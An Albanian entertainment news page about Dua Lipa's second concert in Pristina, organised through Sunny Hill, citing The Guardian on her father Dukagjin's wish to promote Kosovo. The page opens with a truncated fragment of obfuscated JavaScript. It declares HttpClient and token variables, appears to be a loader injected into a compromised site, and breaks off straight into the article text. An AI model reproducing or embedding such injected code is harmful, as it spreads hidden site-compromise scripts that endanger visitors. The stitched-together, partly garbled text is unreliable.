;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

The Guardian shkruan për koncertin e Dua Lipës: Aty këndon edhe babai i saj

By

Këngëtarja e famshme Dua Lipa do të vijë në Kosovë për të mbajtur për të dytën herë koncert në vendlindje.

Dhe me koncertin gjigant që do të organizohet nga Sunny Hill në Prishtinë, po vjen edhe një promovim i hatashëm i Kosovës në arenën ndërkombëtare.

Dua që vitin e fundit ka qenë e jashtëzakonshme me sukseset e saj, po e prezanton Kosovën në mënyrën më të mirë të mundshme.

Për koncertin e saj, ka shkruar edhe prestigjiozja britanike “The Guardian”, duke theksuar se në këtë koncert këndon edhe babai i Duas, Dukagjini.

“Dugi Lipa ka kohë që kishte dashur të organizonte një koncert të mirëqenë në vendin e tij në Kosovë dhe donte që ta vendoste Kosovën në hartën kulturore dhe ta dëshmonte se shteti më i ri në Kosovë do të definohej më shumë se sa një vend me konflikt e skandal”, shkruan Guardian.

E misioni i tij u bë më i lehtë kur vajza e tij Dua, u bë një yl ndërkombëtar e tani, ajo po vjen në Prishtinë dhe shpresa e familjes është që imazhi i Kosovës në botë, të shpërndahet me krenari. /Prive.al

 

Artikuj të ngjashëm